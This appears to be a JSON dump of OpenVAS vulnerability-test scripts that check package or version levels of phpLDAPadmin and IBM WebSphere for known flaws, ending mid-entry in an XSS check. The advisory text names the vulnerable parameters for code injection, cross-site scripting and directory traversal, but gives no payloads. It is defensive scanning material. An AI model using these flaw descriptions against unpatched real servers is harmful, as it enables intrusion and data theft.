script_tag(name:\"creation_date\", value:\"2011-11-25 11:58:32 +0530 (Fri, 25 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2011-14993\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Fedora Update for phpldapadmin FEDORA-2011-14993\");\n\n script_summary(\"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.1.1~2.20111006git.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:55:52", "description": "Check for the Version of phpldapadmin", "cvss3": {}, "published": "2011-11-03T00:00:00", "type": "openvas", "title": "Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831481", "href": "http://plugins.openvas.org/nasl.php?oid=831481", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and corrected in phpldapadmin:\n\n Input appended to the URL in cmd.php \\(when cmd is set to _debug\\)\n is not properly sanitised before being returned to the user. This can\n be exploited to execute arbitrary HTML and script code in a user&#039;s\n browser session in context of an affected site (CVE-2011-4074).\n \n Input passed to the orderby parameter in cmd.php \\(when cmd is set\n to query_engine, query is set to none, and search is set to e.g. 1\\)\n is not properly sanitised in lib/functions.php before being used in\n a create_function() function call. This can be exploited to inject\n and execute arbitrary PHP code (CVE-2011-4075).\n \n The updated packages have been upgraded to the latest version (1.2.2)\n which is not vulnerable to these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpldapadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-11/msg00001.php\");\n script_id(831481);\n script_version(\"$Revision: 6565 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 14:56:06 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_xref(name: \"MDVSA\", value: \"2011:163\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\");\n\n script_summary(\"Check for the Version of phpldapadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.2~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:57", "description": "The remote host is missing an update to phpldapadmin\nannounced via advisory DSA 2333-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2333-1 (phpldapadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231070549", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070549", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2333_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2333-1 (phpldapadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70549\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4075\", \"CVE-2011-4074\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:28 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2333-1 (phpldapadmin)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(5|6)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202333-1\");\n script_tag(name:\"insight\", value:\"Two vulnerabilities have been discovered in phpldapadmin, a web based\ninterface for administering LDAP servers. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-4074\n\nInput appended to the URL in cmd.php (when cmd is set to _debug) is\nnot properly sanitised before being returned to the user. This can be\nexploited to execute arbitrary HTML and script code in a user's browser\nsession in context of an affected site.\n\nCVE-2011-4075\n\nInput passed to the orderby parameter in cmd.php (when cmd is set to\nquery_engine, query is set to none, and search is set to e.g.\n1) is not properly sanitised in lib/functions.php before being used in a\ncreate_function() function call. This can be exploited to inject and\nexecute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your phpldapadmin packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to phpldapadmin\nannounced via advisory DSA 2333-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"phpldapadmin\", ver:\"1.1.0.5-6+lenny2\", rls:\"DEB5\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"phpldapadmin\", ver:\"1.2.0.5-2+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-03T00:00:00", "type": "openvas", "title": "Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310831481", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831481", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-11/msg00001.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831481\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_xref(name:\"MDVSA\", value:\"2011:163\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_name(\"Mandriva Update for phpldapadmin MDVSA-2011:163 (phpldapadmin)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpldapadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_mes5\");\n script_tag(name:\"affected\", value:\"phpldapadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities was discovered and corrected in phpldapadmin:\n\n Input appended to the URL in cmd.php \\(when cmd is set to _debug\\)\n is not properly sanitised before being returned to the user. This can\n be exploited to execute arbitrary HTML and script code in a user's\n browser session in context of an affected site (CVE-2011-4074).\n\n Input passed to the orderby parameter in cmd.php \\(when cmd is set\n to query_engine, query is set to none, and search is set to e.g. 1\\)\n is not properly sanitised in lib/functions.php before being used in\n a create_function() function call. This can be exploited to inject\n and execute arbitrary PHP code (CVE-2011-4075).\n\n The updated packages have been upgraded to the latest version (1.2.2)\n which is not vulnerable to these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpldapadmin\", rpm:\"phpldapadmin~1.2.2~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:27", "description": "The remote host is missing an update to phpldapadmin\nannounced via advisory DSA 2333-1.", "cvss3": {}, "published": "2012-02-11T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2333-1 (phpldapadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70549", "href": "http://plugins.openvas.org/nasl.php?oid=70549", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2333_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2333-1 (phpldapadmin)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Two vulnerabilities have been discovered in phpldapadmin, a web based\ninterface for administering LDAP servers. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2011-4074\n\nInput appended to the URL in cmd.php (when cmd is set to _debug) is\nnot properly sanitised before being returned to the user. This can be\nexploited to execute arbitrary HTML and script code in a user's browser\nsession in context of an affected site.\n\nCVE-2011-4075\n\nInput passed to the orderby parameter in cmd.php (when cmd is set to\nquery_engine, query is set to none, and search is set to e.g.\n1) is not properly sanitised in lib/functions.php before being used in a\ncreate_function() function call. This can be exploited to inject and\nexecute arbitrary PHP code.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 1.2.0.5-2+squeeze1.\n\nFor the testing distribution (wheezy), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.2.0.5-2.1.\n\nWe recommend that you upgrade your phpldapadmin packages.\";\ntag_summary = \"The remote host is missing an update to phpldapadmin\nannounced via advisory DSA 2333-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202333-1\";\n\nif(description)\n{\n script_id(70549);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-4075\", \"CVE-2011-4074\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 02:27:28 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2333-1 (phpldapadmin)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"phpldapadmin\", ver:\"1.1.0.5-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"phpldapadmin\", ver:\"1.2.0.5-2+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-09-04T14:19:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1359"], "description": "The host is running IBM WebSphere Application Server and is prone\n to directory traversal vulnerability.", "modified": "2017-08-31T00:00:00", "published": "2011-09-09T00:00:00", "id": "OPENVAS:801977", "href": "http://plugins.openvas.org/nasl.php?oid=801977", "type": "openvas", "title": "IBM WebSphere Application Server Administration Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_was_admin_console_dir_trav_vuln.nasl 7029 2017-08-31 11:51:40Z teissa $\n#\n# IBM WebSphere Application Server Administration Directory Traversal Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to read arbitrary files on the\n affected application and obtain sensitive information that may lead to\n further attacks.\n Impact Level: Application\";\ntag_affected = \"IBM WebSphere Application Server versions 6.1 before 6.1.0.41,\n 7.0 before 7.0.0.19 and 8.0 before 8.0.0.1\";\ntag_insight = \"The flaw is due to error in administration console which fails to\n handle certain requests. This allows remote attackers to read arbitrary\n files via a '../' (dot dot) in the URI.\";\ntag_solution = \"Upgrade IBM WebSphere Application Server to 6.1.0.41 or 7.0.0.19 or\n 8.0.0.1\n For updates refer to http://www-01.ibm.com/support/docview.wss?uid=swg24028875\";\ntag_summary = \"The host is running IBM WebSphere Application Server and is prone\n to directory traversal vulnerability.\";\n\nif(description)\n{\n script_id(801977);\n script_version(\"$Revision: 7029 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-31 13:51:40 +0200 (Thu, 31 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)\");\n script_cve_id(\"CVE-2011-1359\");\n script_bugtraq_id(49362);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"IBM WebSphere Application Server Administration Directory Traversal Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/45749\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/69473\");\n script_xref(name : \"URL\" , value : \"http://www-01.ibm.com/support/docview.wss?uid=swg21509257\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_ibm_websphere_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ninclude(\"host_details.inc\");\n\nCPE = 'cpe:/a:ibm:websphere_application_server';\n\nif( ! vers = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\n## Check for IBM WebSphere Application Server versions\nif(version_is_equal(version: vers, test_version:\"8.0.0.0\") ||\n version_in_range(version: vers, test_version: \"6.1\", test_version2: \"6.1.0.40\") ||\n version_in_range(version: vers, test_version: \"7.0\", test_version2: \"7.0.0.18\")){\n report = report_fixed_ver( installed_version:vers, fixed_version:'6.1.0.41/7.0.0.19' );\n security_message(port:0, data:report);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1359"], "description": "The host is running IBM WebSphere Application Server and is prone\n to directory traversal vulnerability.", "modified": "2019-02-21T00:00:00", "published": "2011-09-09T00:00:00", "id": "OPENVAS:1361412562310801977", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801977", "type": "openvas", "title": "IBM WebSphere Application Server Administration Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_was_admin_console_dir_trav_vuln.nasl 13803 2019-02-21 08:24:24Z cfischer $\n#\n# IBM WebSphere Application Server Administration Directory Traversal Vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801977\");\n script_version(\"$Revision: 13803 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-21 09:24:24 +0100 (Thu, 21 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-09 17:36:48 +0200 (Fri, 09 Sep 2011)\");\n script_cve_id(\"CVE-2011-1359\");\n script_bugtraq_id(49362);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"IBM WebSphere Application Server Administration Directory Traversal Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_ibm_websphere_detect.nasl\");\n script_mandatory_keys(\"ibm_websphere_application_server/installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/45749\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/69473\");\n script_xref(name:\"URL\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21509257\");\n script_xref(name:\"URL\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg24028875\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to read arbitrary files on the\n affected application and obtain sensitive information that may lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"IBM WebSphere Application Server versions 6.1 before 6.1.0.41,\n 7.0 before 7.0.0.19 and 8.0 before 8.0.0.1\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to error in administration console which fails to\n handle certain requests. This allows remote attackers to read arbitrary files via a '../' (dot dot) in the URI.\");\n\n script_tag(name:\"solution\", value:\"Upgrade IBM WebSphere Application Server to 6.1.0.41 or 7.0.0.19 or\n 8.0.0.1\");\n\n script_tag(name:\"summary\", value:\"The host is running IBM WebSphere Application Server and is prone\n to directory traversal vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nCPE = \"cpe:/a:ibm:websphere_application_server\";\n\nif(!vers = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\nif(version_is_equal(version:vers, test_version:\"8.0.0.0\") ||\n version_in_range(version:vers, test_version:\"6.1\", test_version2:\"6.1.0.40\") ||\n version_in_range(version:vers, test_version:\"7.0\", test_version2:\"7.0.0.18\")){\n report = report_fixed_ver(installed_version:vers, fixed_version:\"6.1.0.41/7.0.0.19\");\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:32:54", "description": "This host is running phpLDAPadmin and is prone to cross site\n scripting vulnerability.", "cvss3": {}, "published": "2011-11-03T00:00:00", "type": "openvas", "title": "phpLDAPadmin '_debug' Cross Site Scripting Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4074"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310802265", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpLDAPadmin '_debug' Cross Site Scripting Vulnerability\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802265\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-11-03 12:22:48 +0100 (Thu, 03 Nov 2011)\");\n script_cve_id(\"CVE-2011-4074\");\n script_bugtraq_id(50331);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"phpLDAPadmin '_debug' Cross Site Scripting Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"phpldapadmin_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpldapadmin/installed\");\n\n script_xref(name:\"URL\", 